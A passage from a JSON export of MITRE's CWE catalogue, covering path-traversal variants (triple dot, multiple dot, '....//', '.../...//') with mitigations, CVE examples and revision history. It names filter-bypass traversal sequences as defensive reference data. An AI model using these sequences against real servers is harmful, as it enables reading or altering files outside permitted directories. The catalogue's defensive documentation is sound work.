Traversal"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-10","Modification_Comment":"fixed incorrect manipulation in name (desc was correct)."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Applicable_Platforms, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Path Issue - Directory Doubled Dot Dot Backslash - \'directory\\\\..\\\\..\\\\filename\'","attr":{"@_Date":"2008-04-11"}},{"#text":"Path Traversal: \'dir\\\\..\\\\filename\'","attr":{"@_Date":"2008-10-14"}}]}},"32":{"attr":{"@_ID":"32","@_Name":"Path Traversal: \'...\' (Triple Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'...\' (triple dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'...\' manipulation is useful for bypassing some path traversal protection schemes. On some Windows systems, it is equivalent to \\"..\\\\..\\" and might bypass checks that assume only two dots are valid. Incomplete filtering, such as removal of \\"./\\" sequences, can ultimately produce valid \\"..\\" sequences due to a collapse into unsafe value (CWE-182)."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0467","Description":"\\"\\\\...\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0467"},{"Reference":"CVE-2001-0615","Description":"\\"...\\" or \\"....\\" in chat server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615"},{"Reference":"CVE-2001-0963","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0963"},{"Reference":"CVE-2001-1193","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1193"},{"Reference":"CVE-2001-1131","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1131"},{"Reference":"CVE-2001-0480","Description":"read of arbitrary files and directories using GET or CD with \\"...\\" in Windows-based FTP server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0480"},{"Reference":"CVE-2002-0288","Description":"read files using \\".\\" and Unicode-encoded \\"/\\" or \\"\\\\\\" characters in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0288"},{"Reference":"CVE-2003-0313","Description":"Directory listing of web server using \\"...\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0313"},{"Reference":"CVE-2005-1658","Description":"Triple dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1658"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'...\' (triple dot)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"This manipulation-focused entry is currently hiding two distinct weaknesses, so it might need to be split. The manipulation is effective in two different contexts:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["it is equivalent to \\"..\\\\..\\" on Windows, or","it can take advantage of incomplete filtering, e.g. if the programmer does a single-pass removal of \\"./\\" in a string (collapse of data into unsafe value, CWE-182)."]}}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Maintenance_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Maintenance_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Triple Dot - \'...\'","attr":{"@_Date":"2008-04-11"}}}},"33":{"attr":{"@_ID":"33","@_Name":"Path Traversal: \'....\' (Multiple Dot)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'....\' (multiple dot) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'....\' manipulation is useful for bypassing some path traversal protection schemes. On some Windows systems, it is equivalent to \\"..\\\\..\\\\..\\" and might bypass checks that assume only two dots are valid. Incomplete filtering, such as removal of \\"./\\" sequences, can ultimately produce valid \\"..\\" sequences due to a collapse into unsafe value (CWE-182)."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0240","Description":"read files via \\"/........../\\" in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0240"},{"Reference":"CVE-2000-0773","Description":"read files via \\"....\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0773"},{"Reference":"CVE-1999-1082","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1082"},{"Reference":"CVE-2004-2121","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121"},{"Reference":"CVE-2001-0491","Description":"multiple attacks using \\"..\\", \\"...\\", and \\"....\\" in different commands","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0491"},{"Reference":"CVE-2001-0615","Description":"\\"...\\" or \\"....\\" in chat server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'....\' (multiple dot)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"Like the triple-dot CWE-32, this manipulation probably hides multiple weaknesses that should be made more explicit.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Dot - \'....\'","attr":{"@_Date":"2008-04-11"}}}},"34":{"attr":{"@_ID":"34","@_Name":"Path Traversal: \'....//\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'....//\' (doubled dot dot slash) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'....//\' manipulation is useful for bypassing some path traversal protection schemes. If \\"../\\" is filtered in a sequential fashion, as done by some regular expression engines, then \\"....//\\" can collapse into the \\"../\\" unsafe value (CWE-182). It could also be useful when \\"..\\" is removed, if the operating system treats \\"//\\" and \\"/\\" as equivalent."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-1670","Description":"Mail server allows remote attackers to create arbitrary directories via a \\"..\\" or rename arbitrary files via a \\"....//\\" in user supplied parameters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1670"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'....//\' (doubled dot dot slash)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"This could occur due to a cleansing error that removes a single \\"../\\" from \\"....//\\"","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Doubled Dot Dot Slash - \'....//\'","attr":{"@_Date":"2008-04-11"}}}},"35":{"attr":{"@_ID":"35","@_Name":"Path Traversal: \'.../...//\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'.../...//\' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'.../...//\' manipulation is useful for bypassing some path traversal protection schemes. If \\"../\\" is filtered in a sequential fashion, as done by some regular expression engines, then \\".../...//\\" can collapse into the \\"../\\" unsafe value (CWE-182). Removing the first \\"../\\" yields \\"....//\\"; the second removal yields \\"../\\". Depending on the algorithm, the software could be susceptible to CWE-34 but not CWE-35, or vice versa."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2169","Description":"chain: \\".../...//\\" bypasses protection mechanism using regexp\'s that remove \\"../\\" resulting in collapse into an unsafe value \\"../\\" (CWE-182) and resultant path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2005-0202","Description":"\\".../....///\\" bypasses regexp\'s that remove \\"./\\" and \\"../\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0202"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'.../...//\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Doubled Triple Dot Slash - \'.../...//\'","attr":{"@_Date":"2008-04-11"}}}},"36":{"attr":{"@_ID":"36","@_Name":"Absolute Path Traversal","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as \\"/abs/path\\" that can resolve to a location that is outside of that 